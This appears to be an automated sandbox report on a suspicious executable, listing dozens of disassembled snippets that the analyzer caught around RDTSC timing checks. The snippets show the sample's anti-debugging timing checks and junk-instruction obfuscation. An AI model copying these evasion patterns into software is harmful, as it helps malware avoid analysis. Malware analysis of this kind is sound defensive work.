                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFDE2 second address: 5DFE6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F789CC6148Dh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F789CC61488h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov dl, 2Fh 0x0000002a xor dword ptr [ebp+1248483Dh], ebx 0x00000030 lea eax, dword ptr [ebp+12491B75h] 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F789CC61488h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 js 00007F789CC6148Bh 0x00000056 sbb di, 4480h 0x0000005b jmp 00007F789CC61492h 0x00000060 mov ecx, dword ptr [ebp+122D3B4Dh] 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c pop esi 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE6E second address: 5DFE74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE74 second address: 5BD463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edx, dword ptr [ebp+122D3B19h] 0x00000013 call dword ptr [ebp+122D1F44h] 0x00000019 je 00007F789CC614A3h 0x0000001f jmp 00007F789CC6148Fh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFEF5 second address: 5DFEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E034D second address: 421C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F789CC61494h 0x0000000e nop 0x0000000f jmp 00007F789CC61494h 0x00000014 push dword ptr [ebp+122D0825h] 0x0000001a or dword ptr [ebp+1246AF5Bh], edx 0x00000020 mov edi, 2E501714h 0x00000025 call dword ptr [ebp+122D2509h] 0x0000002b pushad 0x0000002c pushad 0x0000002d mov edi, dword ptr [ebp+122D3B49h] 0x00000033 popad 0x00000034 xor eax, eax 0x00000036 mov dword ptr [ebp+122D1953h], edi 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jmp 00007F789CC61495h 0x00000045 mov dword ptr [ebp+122D3A41h], eax 0x0000004b xor dword ptr [ebp+122D1953h], ecx 0x00000051 sub dword ptr [ebp+122D23D4h], edi 0x00000057 mov esi, 0000003Ch 0x0000005c jmp 00007F789CC61492h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 je 00007F789CC61492h 0x0000006b jbe 00007F789CC6148Ch 0x00000071 mov dword ptr [ebp+122D1953h], ebx 0x00000077 lodsw 0x00000079 clc 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e pushad 0x0000007f mov bh, 82h 0x00000081 jbe 00007F789CC61486h 0x00000087 popad 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c cld 0x0000008d nop 0x0000008e push ecx 0x0000008f push eax 0x00000090 push edx 0x00000091 jns 00007F789CC61486h 0x00000097 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E03F2 second address: 5E043C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5B1h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F789C73D5ABh 0x00000011 push esi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ebx 0x0000001b jns 00007F789C73D5B1h 0x00000021 pop ebx 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jp 00007F789C73D5A6h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E043C second address: 5E044B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F789CC61486h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E044B second address: 5E0485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F789C73D5B8h 0x0000000f pop eax 0x00000010 mov edx, 03E2B802h 0x00000015 push C725E319h 0x0000001a pushad 0x0000001b push edx 0x0000001c jp 00007F789C73D5A6h 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0485 second address: 5E0489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E093B second address: 5E0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0941 second address: 5E0972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and cl, FFFFFFCEh 0x0000000e push 00000004h 0x00000010 mov cl, ah 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F789CC61499h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E0E3B second address: 5E0E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F6A2 second address: 60F6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F789CC61486h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F6AC second address: 60F6CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F6CB second address: 60F6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F81C second address: 60F822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F822 second address: 60F83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f jns 00007F789CC61488h 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60F83D second address: 60F841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60FB4E second address: 60FB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60FF5E second address: 60FF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60FF66 second address: 60FF74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F789CC61492h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60FF74 second address: 60FF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F789C73D5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F789C73D5D4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60FF8A second address: 60FF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60FF8E second address: 60FFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F789C73D5B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F789C73D5A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6100AF second address: 6100BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F789CC6148Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618865 second address: 61886A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618AB5 second address: 618AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Bh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 618AC9 second address: 618AD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61933B second address: 619345 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F789CC6148Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6194BC second address: 6194CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C2C6 second address: 61C2E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F789CC6149Dh 0x0000000c jmp 00007F789CC61497h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C2E9 second address: 61C2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F789C73D5A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C2F3 second address: 61C324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F789CC61495h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 js 00007F789CC6149Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C324 second address: 61C32E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F789C73D5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C498 second address: 61C49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61C49E second address: 61C4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F789C73D5B1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 61E81C second address: 61E823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 622564 second address: 62256D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 622021 second address: 622027 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 622027 second address: 62202C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6222C6 second address: 6222D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F789CC61486h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6222D2 second address: 622323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F789C73D5B1h 0x00000012 jnl 00007F789C73D5CCh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 622323 second address: 622338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61491h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 623BCC second address: 623C05 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F789C73D5C6h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F789C73D5AAh 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 623C05 second address: 623C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007F789CC6148Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 629EF3 second address: 629F1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F789C73D5A6h 0x00000009 jng 00007F789C73D5A6h 0x0000000f popad 0x00000010 je 00007F789C73D5BEh 0x00000016 jmp 00007F789C73D5B2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62876A second address: 628772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628772 second address: 62877C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6288D6 second address: 6288DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628C01 second address: 628C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628C09 second address: 628C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628C12 second address: 628C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F789C73D5A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628D8F second address: 628DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628DA2 second address: 628DBF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F789C73D5A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F789C73D5B1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628F09 second address: 628F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628F15 second address: 628F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 628F1C second address: 628F54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F789CC6148Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jl 00007F789CC61486h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 jne 00007F789CC61486h 0x0000001d jmp 00007F789CC6148Fh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6291E8 second address: 6291EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6291EC second address: 6291F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6291F0 second address: 6291F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62DB98 second address: 62DB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62CF27 second address: 62CF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F789C73D5B7h 0x0000000f push eax 0x00000010 jmp 00007F789C73D5AEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62D6C6 second address: 62D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F789CC61495h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 62D6E2 second address: 62D6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F789C73D5ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 634B92 second address: 634BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F789CC61490h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 632E3E second address: 632E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789C73D5AAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 632E50 second address: 632E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 633112 second address: 63311C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F789C73D5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63311C second address: 633149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F789CC6148Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F789CC61496h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6336FC second address: 63370F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007F789C73D5A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63370F second address: 633713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 633713 second address: 633723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789C73D5ACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 633973 second address: 633979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 634244 second address: 63424A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63424A second address: 63424E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63486D second address: 634876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 634876 second address: 63488D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F789CC61493h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63488D second address: 6348F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F789C73D5B6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 jne 00007F789C73D5E7h 0x00000018 jl 00007F789C73D5D3h 0x0000001e jmp 00007F789C73D5B6h 0x00000023 jmp 00007F789C73D5B7h 0x00000028 jl 00007F789C73D5AEh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638521 second address: 638536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F789CC6148Dh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638536 second address: 638547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F789C73D5A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638547 second address: 63854D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63854D second address: 638551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 63895A second address: 638988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F789CC6148Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F789CC61496h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638988 second address: 638996 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 638996 second address: 63899C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
